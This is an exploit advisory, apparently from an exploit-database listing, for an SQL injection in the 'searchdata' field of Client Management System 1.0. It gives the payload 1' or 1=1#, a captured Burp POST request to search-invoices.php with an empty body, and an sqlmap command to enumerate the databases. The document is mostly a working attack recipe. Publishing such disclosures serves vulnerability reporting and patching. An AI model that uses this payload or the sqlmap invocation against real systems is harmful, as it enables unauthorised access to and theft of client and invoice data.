# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
# Date: 26/10/2020
# Exploit Author: Serkan Sancar
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/clientms/client/index.php

Step 2: Login to client user on panel

Step 3: use check sql injection payload 1' or 1=1# in searchbox field

Malicious Request on burp suite

POST /clientms/client/search-invoices.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/clientms/client/search-invoices.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
Upgrade-Insecure-Requests: 1


Step 4: You will list all invoices and you will had checked sql injection on The Panel.

Example other method:
you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs